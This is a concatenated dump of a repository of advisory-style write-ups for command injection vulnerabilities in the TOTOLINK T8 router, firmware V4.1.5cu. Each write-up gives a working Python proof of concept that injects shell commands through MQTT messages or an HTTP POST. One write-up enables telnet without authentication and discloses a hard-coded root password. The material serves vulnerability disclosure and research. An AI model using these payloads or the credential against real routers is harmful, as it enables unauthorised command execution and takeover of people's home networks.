https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/4.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/5.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/meshSlaveUpdate.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `meshSlaveUpdate`,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116191049592](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | client = mqtt.Client() 38 | client.connect("192.168.0.1",1883,60) 39 | client.publish("totolink/router/meshSlaveUpdate", b'{"serverIp": ";ls>/tmp/meshSlaveUpdate.txt;"}') 40 | ``` 41 | 42 | ![image-20230116191129895](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_ip/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_ip/images/1.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_ip/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_ip/images/2.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_ip/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_ip/images/3.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_ip/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_ip/images/4.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_ip/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_ip/images/5.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_ip/recvSlaveCloudCheckStatus_ip.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function recvSlaveCloudCheckStatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function recvSlaveCloudCheckStatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `recvSlaveCloudCheckStatus`,The "ip" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116190613535](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | client = mqtt.Client() 38 | client.connect("192.168.0.1",1883,60) 39 | client.publish("totolink/router/recvSlaveCloudCheckStatus", b'{"ip": ";`ls>/tmp/recvSlaveCloudCheckStatus_ip.txt`;"}') 40 | ``` 41 | 42 | ![image-20230116190913541](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_version/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_version/images/1.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_version/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_version/images/2.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_version/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_version/images/3.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_version/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_version/images/4.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_version/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveCloudCheckStatus_version/images/5.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveCloudCheckStatus_version/recvSlaveCloudCheckStatus.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function recvSlaveCloudCheckStatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function recvSlaveCloudCheckStatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `recvSlaveCloudCheckStatus`,The "version" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116190613535](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | client = mqtt.Client() 38 | client.connect("192.168.0.1",1883,60) 39 | client.publish("totolink/router/recvSlaveCloudCheckStatus", b'{"version": ";`ls>/tmp/recvSlaveCloudCheckStatus.txt`;"}') 40 | ``` 41 | 42 | ![image-20230116190718260](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/recvSlaveUpgstatus/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveUpgstatus/images/1.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveUpgstatus/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveUpgstatus/images/2.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveUpgstatus/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveUpgstatus/images/3.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveUpgstatus/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveUpgstatus/images/4.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveUpgstatus/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/recvSlaveUpgstatus/images/5.png -------------------------------------------------------------------------------- /totolink_t8/recvSlaveUpgstatus/recvSlaveUpgstatus.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function recvSlaveUpgstatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function recvSlaveUpgstatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `recvSlaveUpgstatus`,The "ip" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116190012321](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | 38 | client = mqtt.Client() 39 | client.connect("192.168.0.1",1883,60) 40 | client.publish("totolink/router/recvSlaveUpgstatus", b'{"status":"1","ip":";ls>/tmp/recvSlaveUpgstatus.txt;"}') 41 | ``` 42 | 43 | ![image-20230116190122667](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/setUpgradeFW/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/setUpgradeFW/images/1.png -------------------------------------------------------------------------------- /totolink_t8/setUpgradeFW/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/setUpgradeFW/images/2.png -------------------------------------------------------------------------------- /totolink_t8/setUpgradeFW/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/setUpgradeFW/images/3.png -------------------------------------------------------------------------------- /totolink_t8/setUpgradeFW/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/setUpgradeFW/images/4.png -------------------------------------------------------------------------------- /totolink_t8/setUpgradeFW/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/setUpgradeFW/images/5.png -------------------------------------------------------------------------------- /totolink_t8/setUpgradeFW/setUpgradeFW.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW 2 | 3 | ## Description 4 | 5 | TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | In function `sub_421678`,The "slaveIpList" parameter does not filter user input, which can cause command injection vulnerabilities 24 | 25 | ![image-20230116192918205](images/3.png) 26 | 27 | POC 28 | 29 | ``` 30 | import requests 31 | url = "http://192.168.0.1/cgi-bin/cstecgi.cgi" 32 | cookie = {"Cookie":"SESSION_ID=2:1672999258:2"} 33 | data = {'FileName':'aa', 'slaveIpList':'0\"|ls />/tmp/setUpgradeFW.txt|echo \"22', 'topicurl':'setting/setUpgradeFW'} 34 | rep = requests.post(url, cookies=cookie, json=data) 35 | print(rep.status_code) 36 | print(rep.text) 37 | ``` 38 | 39 | ![image-20230116192841151](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/1.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/2.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/3.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/4.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/5.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/6.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/images/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/telnet_login/images/7.png -------------------------------------------------------------------------------- /totolink_t8/telnet_login/telnet_login.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK T8 TELNET 2 | 3 | ## Description 4 | 5 | Attackers can start the Telnet service without authorization and log in to the telnet service with a hard-coded password 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | Telnet is enabled by sending the following POST packet . 24 | 25 | ``` 26 | import requests 27 | url = "http://192.168.0.1/cgi-bin/cstecgi.cgi" 28 | data = '{"telnet_enabled":"1","topicurl":"setTelnetCfg"}' 29 | rep = requests.post(url, data=data) 30 | print(rep.status_code) 31 | print(rep.content) 32 | ``` 33 | 34 | The default account password exists in the file `/web_cste/cgi-bin/product.ini`:`root:KL@UHeZ0` 35 | 36 | ![image-20230116195313617](images/6.png) 37 | 38 | ![image-20230116194911323](images/4.png) 39 | 40 | In `/bin/cs` 41 | 42 | ![image-20230116194625197](images/3.png) 43 | 44 | In `bin/convertIniToCfg` 45 | 46 | ![image-20230116195206223](images/5.png) 47 | 48 | success! 49 | 50 | ![image-20230116195635180](images/7.png) 51 | -------------------------------------------------------------------------------- /totolink_t8/updateWifiInfo/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/updateWifiInfo/images/1.png -------------------------------------------------------------------------------- /totolink_t8/updateWifiInfo/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/updateWifiInfo/images/2.png -------------------------------------------------------------------------------- /totolink_t8/updateWifiInfo/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/updateWifiInfo/images/3.png -------------------------------------------------------------------------------- /totolink_t8/updateWifiInfo/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/updateWifiInfo/images/4.png -------------------------------------------------------------------------------- /totolink_t8/updateWifiInfo/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/updateWifiInfo/images/5.png -------------------------------------------------------------------------------- /totolink_t8/updateWifiInfo/updateWifiInfo.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `updateWifiInfo`,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116184932045](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | 38 | client = mqtt.Client() 39 | client.connect("192.168.0.1",1883,60) 40 | client.publish("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}') 41 | ``` 42 | 43 | ![image-20230116185057455](images/4.png) --------------------------------------------------------------------------------